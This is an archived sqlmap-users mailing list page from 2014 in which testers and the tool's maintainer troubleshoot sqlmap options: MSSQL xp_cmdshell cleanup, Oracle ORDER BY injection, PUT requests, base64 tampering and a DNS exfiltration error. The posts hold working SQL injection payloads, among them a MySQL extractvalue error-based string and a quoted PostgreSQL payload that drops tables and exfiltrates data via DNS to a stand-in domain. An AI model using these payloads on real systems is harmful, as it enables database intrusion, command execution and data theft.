sqlmap-users Mailing List for sqlmap (Page 17)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2014-12-05 10:56:29
|
Will check this out in an hour or so. At first glance I can see that we have to make a patch for MsSQL. Bye On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja> wrote: > Looking at the commands sent I can see three drop tables for > sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored > procedures. > > On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote: > > Just spotted --cleanup but that didn't remove the procedure, sqlmap > > command seemed to run OK though but didn't say anything about what it > > was removing, should it have done? > > > > Robin > > > > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote: > >> I'm testing sqlmap against an MSSQL DB and looking at running OS > >> commands. In an attempt to reenable xp_cmdshell a stored proc called > >> xp_gedp has been created and left behind, is there any way to > >> automatically clean up this and any other things that are created? > >> > >> Robin > > > ------------------------------------------------------------------------------ > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > with Interactivity, Sharing, Native Excel Exports, App Integration & more > Get technology previously reserved for billion-dollar corporations, FREE > > http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Robin W. <ro...@di...> - 2014-12-04 15:33:32
|
Just spotted --cleanup but that didn't remove the procedure, sqlmap command seemed to run OK though but didn't say anything about what it was removing, should it have done? Robin On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote: > I'm testing sqlmap against an MSSQL DB and looking at running OS > commands. In an attempt to reenable xp_cmdshell a stored proc called > xp_gedp has been created and left behind, is there any way to > automatically clean up this and any other things that are created? > > Robin |
|
From: Robin W. <ro...@di...> - 2014-12-04 15:30:45
|
I'm testing sqlmap against an MSSQL DB and looking at running OS commands. In an attempt to reenable xp_cmdshell a stored proc called xp_gedp has been created and left behind, is there any way to automatically clean up this and any other things that are created? Robin |
|
From: Robin W. <ro...@di...> - 2014-12-04 15:30:21
|
This is from page 57 of the readme.pdf On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality explained above) a shared library (binary file) containing two user-defined functions, sys_exec() and sys_eval(), then it creates these two functions on the database and calls one of them to execute the specified command, depending on user’s choice to display the standard output or not. Shouldn't this just be for PostgreSQL? as it continues to say, MSSQL uses xp_cmdshell Robin |
|
From: Robin W. <ro...@di...> - 2014-12-04 15:19:40
|
Looking at the commands sent I can see three drop tables for sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored procedures. On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote: > Just spotted --cleanup but that didn't remove the procedure, sqlmap > command seemed to run OK though but didn't say anything about what it > was removing, should it have done? > > Robin > > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote: >> I'm testing sqlmap against an MSSQL DB and looking at running OS >> commands. In an attempt to reenable xp_cmdshell a stored proc called >> xp_gedp has been created and left behind, is there any way to >> automatically clean up this and any other things that are created? >> >> Robin |
|
From: Miroslav S. <mir...@gm...> - 2014-12-03 13:45:39
|
And what's the original sqlmap command you used? Bye On Wed, Dec 3, 2014 at 1:39 PM, Harry Acker <har...@gm...> wrote: > I'm testing an app which I've confirmed is running Oracle and has > injection into the order by field. > > http://xxx/test?order=id > > id is a direct mapping to the database column name. I confirmed injection > with the following: > > http://xxx/test?order=%28select%20%27id%27%20from%20dual%29 > > The site returns either a table of data or the Oracle exception if the > field name given is invalid > > I've ran sqlmap against it with level 5 and risk 3 (its a test site, > client happy to reset if damaged) but it doesn't detect the injection. I've > also tried with --string passing it a value from the table so it knows when > it hits valid data. > > I know this should work and from what I've seen when searching a level 3 > scan should detect it. What am I doing wrong? > > And just for my curiosity, as I've got the working injection, would I be > able to pass that to sqlmap and point it at that to say inject into here. I > gave it a quick try and it complained that the url provided was already > tainted and I should clean it up first. > > Harry. > > > ------------------------------------------------------------------------------ > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > with Interactivity, Sharing, Native Excel Exports, App Integration & more > Get technology previously reserved for billion-dollar corporations, FREE > > http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Harry A. <har...@gm...> - 2014-12-03 12:40:05
|
I'm testing an app which I've confirmed is running Oracle and has injection into the order by field. http://xxx/test?order=id id is a direct mapping to the database column name. I confirmed injection with the following: http://xxx/test?order=%28select%20%27id%27%20from%20dual%29 The site returns either a table of data or the Oracle exception if the field name given is invalid I've ran sqlmap against it with level 5 and risk 3 (its a test site, client happy to reset if damaged) but it doesn't detect the injection. I've also tried with --string passing it a value from the table so it knows when it hits valid data. I know this should work and from what I've seen when searching a level 3 scan should detect it. What am I doing wrong? And just for my curiosity, as I've got the working injection, would I be able to pass that to sqlmap and point it at that to say inject into here. I gave it a quick try and it complained that the url provided was already tainted and I should clean it up first. Harry. |
|
From: Miroslav S. <mir...@gm...> - 2014-11-21 10:40:42
|
Hi. Update to the latest revision and try to use the option --method (e.g. --method=PUT) Bye On Fri, Nov 21, 2014 at 2:57 AM, Miroslav Stampar < mir...@gm...> wrote: > Will do this in a day or two. > > Bye > On Nov 19, 2014 3:46 AM, "Travis Altman" <tra...@gm...> wrote: > >> Is there anyway to supply another http method besides get or post? I >> have an app that is using the put method. Thanks. >> >> >> ------------------------------------------------------------------------------ >> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server >> from Actuate! Instantly Supercharge Your Business Reports and Dashboards >> with Interactivity, Sharing, Native Excel Exports, App Integration & more >> Get technology previously reserved for billion-dollar corporations, FREE >> >> http://pubads.g.doubleclick.net/gampad/clk?id=157005751&iu=/4140/ostg.clktrk >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2014-11-21 01:57:13
|
Will do this in a day or two. Bye On Nov 19, 2014 3:46 AM, "Travis Altman" <tra...@gm...> wrote: > Is there anyway to supply another http method besides get or post? I have > an app that is using the put method. Thanks. > > > ------------------------------------------------------------------------------ > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > with Interactivity, Sharing, Native Excel Exports, App Integration & more > Get technology previously reserved for billion-dollar corporations, FREE > > http://pubads.g.doubleclick.net/gampad/clk?id=157005751&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Sabin R. <thi...@gm...> - 2014-11-19 05:57:47
|
oo, good luck. :) thanks. On Wed, Nov 19, 2014 at 11:32 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > Currently there is none, but we do have it on our TODO list. > > Bye > On Nov 19, 2014 6:45 AM, "Sabin Ranjit" <thi...@gm...> wrote: > >> hi, >> is there any report generation method in sqlmap? So far now I run sqlmap >> from terminal and leave it, and i look for the issues in the terminal. I'm >> looking for the better method like reporting so that i can leave sqlmap in >> the server and check the report other day. >> thanks. >> >> >> ------------------------------------------------------------------------------ >> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server >> from Actuate! Instantly Supercharge Your Business Reports and Dashboards >> with Interactivity, Sharing, Native Excel Exports, App Integration & more >> Get technology previously reserved for billion-dollar corporations, FREE >> >> http://pubads.g.doubleclick.net/gampad/clk?id=157005751&iu=/4140/ostg.clktrk >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> |
|
From: Miroslav S. <mir...@gm...> - 2014-11-19 05:47:36
|
Hi. Currently there is none, but we do have it on our TODO list. Bye On Nov 19, 2014 6:45 AM, "Sabin Ranjit" <thi...@gm...> wrote: > hi, > is there any report generation method in sqlmap? So far now I run sqlmap > from terminal and leave it, and i look for the issues in the terminal. I'm > looking for the better method like reporting so that i can leave sqlmap in > the server and check the report other day. > thanks. > > > ------------------------------------------------------------------------------ > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > with Interactivity, Sharing, Native Excel Exports, App Integration & more > Get technology previously reserved for billion-dollar corporations, FREE > > http://pubads.g.doubleclick.net/gampad/clk?id=157005751&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Sabin R. <thi...@gm...> - 2014-11-19 05:45:30
|
hi, is there any report generation method in sqlmap? So far now I run sqlmap from terminal and leave it, and i look for the issues in the terminal. I'm looking for the better method like reporting so that i can leave sqlmap in the server and check the report other day. thanks. |
|
From: Brandon P. <bpe...@gm...> - 2014-11-19 04:38:43
|
I have actually worked around this with some burp suite trickery (rewriting http verb) and using --proxy with sqlmap... Not ideal. Sent from a computer > On Nov 18, 2014, at 8:45 PM, Travis Altman <tra...@gm...> wrote: > > Is there anyway to supply another http method besides get or post? I have an app that is using the put method. Thanks. > ------------------------------------------------------------------------------ > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > with Interactivity, Sharing, Native Excel Exports, App Integration & more > Get technology previously reserved for billion-dollar corporations, FREE > http://pubads.g.doubleclick.net/gampad/clk?id=157005751&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Travis A. <tra...@gm...> - 2014-11-19 02:46:01
|
Is there anyway to supply another http method besides get or post? I have an app that is using the put method. Thanks. |
|
From: Kaiyi Z. <zky...@gm...> - 2014-11-10 06:46:17
|
I can not receive from the list, So, This is only one test email. Sorry for all. |
|
From: Konrads S. <ko...@sm...> - 2014-11-03 20:20:54
|
Just as a note - I had to do data.encode("base64").strip() to remove the
newline which the encode adds.
--
Konrads Smelkovs
Applied IT sorcery.
On 3 November 2014 07:29, Konrads Smelkovs <ko...@sm...> wrote:
> Cheers, works!
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 2 November 2014 17:10, Miroslav Stampar <mir...@gm...>
> wrote:
>
>> Then please try --eval instead of --tamper.
>>
>> E.g. --eval="param=param.encode('base64')"
>>
>> Bye
>> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <ko...@sm...> wrote:
>>
>>> Miroslav,
>>>
>>> I previously exploited this manually. The injection occurs in the mysql
>>> INSERT statement. If the statement is invalid, we get an error message in
>>> html comments like so:
>>>
>>> <!--You have an error in your SQL syntax; check the manual that
>>> corresponds to your MySQL server version for the right syntax to use near
>>> ''lalalaa))) or'')' at line 1-->
>>>
>>> Which then is exploitable using some well documented methods such as
>>> appending string like this:
>>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>>
>>> which gives us a nice error:
>>> <!--XPATH syntax error: '~root@localhost'-->
>>>
>>>
>>> Anyhow, I got halfway there with the following string:
>>> sqlmap -u '
>>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
>>> --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>>> sqlmap sends correctly encoded test vectors, but it doesn't send the
>>> correct initial URL stability check vector:
>>>
>>> 1st request URL:
>>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>>> 2nd request URL: https://target/script.php?
>>> data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>>
>>> Also none of the test vectors seem to trigger an error response.
>>>
>>> I tried with --risk=3 with no avail.
>>>
>>> version: 1.0-dev-1ef2c40
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>>
>>> On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...>
>>> wrote:
>>>
>>>> Hi.
>>>>
>>>> In your case I would do this:
>>>>
>>>> 1) Decode original base64 value and give it to the sqlmap in decoded
>>>> form (e.g. id=123 instead of original id=313233)
>>>> 2) Use --tamper=base64encode
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...
>>>> > wrote:
>>>>
>>>>> Hello,
>>>>>
>>>>> I am writing a small modification which would allow to tamper/decode
>>>>> variables in the request?
>>>>> As I understand that the parameters are decoded/parsed into a dict
>>>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>>>> full, parsed dict of the get/post/cookie values?
>>>>>
>>>>> (specifically I have a base64 encoded string as a parameter and to
>>>>> insert the payload, the parameter must be base64-decoded, injected and
>>>>> then encoded back)
>>>>>
>>>>>
>>>>> --
>>>>> Konrads Smelkovs
>>>>> Applied IT sorcery.
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>
|
|
From: Konrads S. <ko...@sm...> - 2014-11-03 07:29:32
|
Cheers, works!
--
Konrads Smelkovs
Applied IT sorcery.
On 2 November 2014 17:10, Miroslav Stampar <mir...@gm...>
wrote:
> Then please try --eval instead of --tamper.
>
> E.g. --eval="param=param.encode('base64')"
>
> Bye
> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <ko...@sm...> wrote:
>
>> Miroslav,
>>
>> I previously exploited this manually. The injection occurs in the mysql
>> INSERT statement. If the statement is invalid, we get an error message in
>> html comments like so:
>>
>> <!--You have an error in your SQL syntax; check the manual that
>> corresponds to your MySQL server version for the right syntax to use near
>> ''lalalaa))) or'')' at line 1-->
>>
>> Which then is exploitable using some well documented methods such as
>> appending string like this:
>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>
>> which gives us a nice error:
>> <!--XPATH syntax error: '~root@localhost'-->
>>
>>
>> Anyhow, I got halfway there with the following string:
>> sqlmap -u '
>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
>> --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>> sqlmap sends correctly encoded test vectors, but it doesn't send the
>> correct initial URL stability check vector:
>>
>> 1st request URL:
>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>> 2nd request URL: https://target/script.php?
>> data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>
>> Also none of the test vectors seem to trigger an error response.
>>
>> I tried with --risk=3 with no avail.
>>
>> version: 1.0-dev-1ef2c40
>>
>> --
>> Konrads Smelkovs
>> Applied IT sorcery.
>>
>> On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...>
>> wrote:
>>
>>> Hi.
>>>
>>> In your case I would do this:
>>>
>>> 1) Decode original base64 value and give it to the sqlmap in decoded
>>> form (e.g. id=123 instead of original id=313233)
>>> 2) Use --tamper=base64encode
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...>
>>> wrote:
>>>
>>>> Hello,
>>>>
>>>> I am writing a small modification which would allow to tamper/decode
>>>> variables in the request?
>>>> As I understand that the parameters are decoded/parsed into a dict
>>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>>> full, parsed dict of the get/post/cookie values?
>>>>
>>>> (specifically I have a base64 encoded string as a parameter and to
>>>> insert the payload, the parameter must be base64-decoded, injected and
>>>> then encoded back)
>>>>
>>>>
>>>> --
>>>> Konrads Smelkovs
>>>> Applied IT sorcery.
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
|
|
From: Miroslav S. <mir...@gm...> - 2014-11-02 17:10:35
|
Then please try --eval instead of --tamper.
E.g. --eval="param=param.encode('base64')"
Bye
On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <ko...@sm...> wrote:
> Miroslav,
>
> I previously exploited this manually. The injection occurs in the mysql
> INSERT statement. If the statement is invalid, we get an error message in
> html comments like so:
>
> <!--You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use near
> ''lalalaa))) or'')' at line 1-->
>
> Which then is exploitable using some well documented methods such as
> appending string like this:
> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>
> which gives us a nice error:
> <!--XPATH syntax error: '~root@localhost'-->
>
>
> Anyhow, I got halfway there with the following string:
> sqlmap -u '
> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
> --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
> sqlmap sends correctly encoded test vectors, but it doesn't send the
> correct initial URL stability check vector:
>
> 1st request URL:
> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
> 2nd request URL: https://target/script.php?
> data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>
> Also none of the test vectors seem to trigger an error response.
>
> I tried with --risk=3 with no avail.
>
> version: 1.0-dev-1ef2c40
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...>
> wrote:
>
>> Hi.
>>
>> In your case I would do this:
>>
>> 1) Decode original base64 value and give it to the sqlmap in decoded form
>> (e.g. id=123 instead of original id=313233)
>> 2) Use --tamper=base64encode
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...>
>> wrote:
>>
>>> Hello,
>>>
>>> I am writing a small modification which would allow to tamper/decode
>>> variables in the request?
>>> As I understand that the parameters are decoded/parsed into a dict
>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>> full, parsed dict of the get/post/cookie values?
>>>
>>> (specifically I have a base64 encoded string as a parameter and to
>>> insert the payload, the parameter must be base64-decoded, injected and
>>> then encoded back)
>>>
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
|
|
From: Konrads S. <ko...@sm...> - 2014-11-02 16:42:37
|
Miroslav, I previously exploited this manually. The injection occurs in the mysql INSERT statement. If the statement is invalid, we get an error message in html comments like so: <!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1--> Which then is exploitable using some well documented methods such as appending string like this: ' or extractvalue(1,concat(0x7e,(SELECT user()))) or' which gives us a nice error: <!--XPATH syntax error: '~root@localhost'--> Anyhow, I got halfway there with the following string: sqlmap -u ' https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080 sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector: 1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337 2nd request URL: https://target/script.php? data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D Also none of the test vectors seem to trigger an error response. I tried with --risk=3 with no avail. version: 1.0-dev-1ef2c40 -- Konrads Smelkovs Applied IT sorcery. On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...> wrote: > Hi. > > In your case I would do this: > > 1) Decode original base64 value and give it to the sqlmap in decoded form > (e.g. id=123 instead of original id=313233) > 2) Use --tamper=base64encode > > Kind regards, > Miroslav Stampar > > On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> > wrote: > >> Hello, >> >> I am writing a small modification which would allow to tamper/decode >> variables in the request? >> As I understand that the parameters are decoded/parsed into a dict >> after option.py:2323 (parseTargetDirect()), but where can I access the >> full, parsed dict of the get/post/cookie values? >> >> (specifically I have a base64 encoded string as a parameter and to >> insert the payload, the parameter must be base64-decoded, injected and >> then encoded back) >> >> >> -- >> Konrads Smelkovs >> Applied IT sorcery. >> >> >> ------------------------------------------------------------------------------ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2014-10-31 19:29:54
|
Hi. It should be fixed now with the latest commit [1]. Please update to the latest revision. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/commit/4e0e64d06bbd7c66506c2d2bfeb854c8a546fb4f On Fri, Oct 31, 2014 at 6:35 PM, Chris Clements <ccl...@ou...> wrote: > Working on an injection on a target and got this error when I attempt to > use DNS exfiltration: > > > [12:17:32] [CRITICAL] invalid URL address used (" > https://www.testsite.net:443/SLWebSiteTemplate_V2/login.aspx?sCorpCode=LWNaZ8T2TtGjK3K2nRx99w==-2655');%20DROP%20TABLE%20IF%20EXISTS%20PCSI;%20CREATE%20TABLE%20PCSI(fyYd%20text);%20CREATE%20OR%20REPLACE%20FUNCTION%20mNrn( > )\nRETURNS%20VOID%20AS%20$$\nDECLARE%20gAXt%20TEXT;%20DECLARE%20wNki%20TEXT;%20BEGIN\nSELECT%20INTO%20wNki%20(SELECT%20ENCODE(CONVERT_TO((SUBSTRING((COALESCE(CAST(3084%20AS%20CHARACTER(10000)),'%20'))::text%20FROM%201%20FOR%2031)),'UTF8'),'HEX'));%20gAXt%20:=%20E'COPY%20PCSI(fyYd)%20FROM%20E\\'\\\\\\\\\\\\\\\\HTr.'||wNki||E'. > ZgJ.mydomain.com > \\\\\\\\VwAi\\'';%20EXECUTE%20gAXt;%20END;%20$$%20LANGUAGE%20plpgsql%20SECURITY%20DEFINER;%20SELECT%20mNrn();--&sLocationCode=zI76x8tC/ksUgQBEEYYJfQ==") > > [*] shutting down at 12:17:32 > > > Did some searching, but didn't come up with anything on this error. Can > someone point me in the right direction? > > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Chris C. <ccl...@ou...> - 2014-10-31 17:35:30
|
Working on an injection on a target and got this error when I attempt to use DNS exfiltration:
[12:17:32] [CRITICAL] invalid URL address used ("https://www.testsite.net:443/SLWebSiteTemplate_V2/login.aspx?sCorpCode=LWNaZ8T2TtGjK3K2nRx99w==-2655');%20DROP%20TABLE%20IF%20EXISTS%20PCSI;%20CREATE%20TABLE%20PCSI(fyYd%20text);%20CREATE%20OR%20REPLACE%20FUNCTION%20mNrn()\nRETURNS%20VOID%20AS%20$$\nDECLARE%20gAXt%20TEXT;%20DECLARE%20wNki%20TEXT;%20BEGIN\nSELECT%20INTO%20wNki%20(SELECT%20ENCODE(CONVERT_TO((SUBSTRING((COALESCE(CAST(3084%20AS%20CHARACTER(10000)),'%20'))::text%20FROM%201%20FOR%2031)),'UTF8'),'HEX'));%20gAXt%20:=%20E'COPY%20PCSI(fyYd)%20FROM%20E\\'\\\\\\\\\\\\\\\\HTr.'||wNki||E'.ZgJ.mydomain.com\\\\\\\\VwAi\\'';%20EXECUTE%20gAXt;%20END;%20$$%20LANGUAGE%20plpgsql%20SECURITY%20DEFINER;%20SELECT%20mNrn();--&sLocationCode=zI76x8tC/ksUgQBEEYYJfQ==")
[*] shutting down at 12:17:32
Did some searching, but didn't come up with anything on this error. Can someone point me in the right direction?
|
|
From: Miroslav S. <mir...@gm...> - 2014-10-30 13:12:24
|
Hi. In your case I would do this: 1) Decode original base64 value and give it to the sqlmap in decoded form (e.g. id=123 instead of original id=313233) 2) Use --tamper=base64encode Kind regards, Miroslav Stampar On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> wrote: > Hello, > > I am writing a small modification which would allow to tamper/decode > variables in the request? > As I understand that the parameters are decoded/parsed into a dict > after option.py:2323 (parseTargetDirect()), but where can I access the > full, parsed dict of the get/post/cookie values? > > (specifically I have a base64 encoded string as a parameter and to > insert the payload, the parameter must be base64-decoded, injected and > then encoded back) > > > -- > Konrads Smelkovs > Applied IT sorcery. > > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Konrads S. <ko...@sm...> - 2014-10-30 12:31:53
|
Hello, I am writing a small modification which would allow to tamper/decode variables in the request? As I understand that the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the get/post/cookie values? (specifically I have a base64 encoded string as a parameter and to insert the payload, the parameter must be base64-decoded, injected and then encoded back) -- Konrads Smelkovs Applied IT sorcery. |
|
From: Kaiyi Z. <zky...@gm...> - 2014-10-27 08:34:59
|
Hi, everyone I use sqlmap -u "http://x.x.x.x/testenv/mysql/get_int.php?id=1" -f -b --current-user -v 5 Actully the sql is select * from user where id=$_Get['id'] limit 0,1 Befor I exec this, i rm the sqlmap output directory and open the mysql general_log. I view the sqlmap debug message and mysql.log, there only payloads like "?id=1 xxx" , i think sqlmap fetching the current-db and current-user using error message, but in this example, there should use one payload like "?id=*-1* xxx", Is there somebody explain for me ,Why? Thanks. |
|
From: Brandon P. <bpe...@gm...> - 2014-10-25 15:12:54
|
Nope, shouldn't have anything to do with it. How do you know it is exploitable? You also haven't tried upping the level with --level=5 which is different from risk
Sent from a computer
> On Oct 25, 2014, at 1:41 AM, a dehqan <deh...@gm...> wrote:
>
> Hi
>
>
> Thanks;
>
> Yes of course it's exploitable .
>
> As you see i have used --risk=3 before.
>
> I think Sqlmap isn't able to handle it properly because there is custom injection in name of parameter and also name is an array .
> Any Opinion ?
>
>
> Regards dehqan
>
>> On Fri, Oct 24, 2014 at 4:00 AM, Ryan Sears <rd...@mt...> wrote:
>> // Grrr, stupid gmail. Didn't reply-all first time :-P
>>
>> Are you sure it's exploitable? Try upping the --level and --risk.
>>
>> The #1* means the first * character you put into the --data parameter. It's in lieu of saying something like "POST parameter 'derp' is not exploitable" if you pass in --data="derp=testme" and ask it to test the "derp" parameter.
>>
>> Ryan
>>
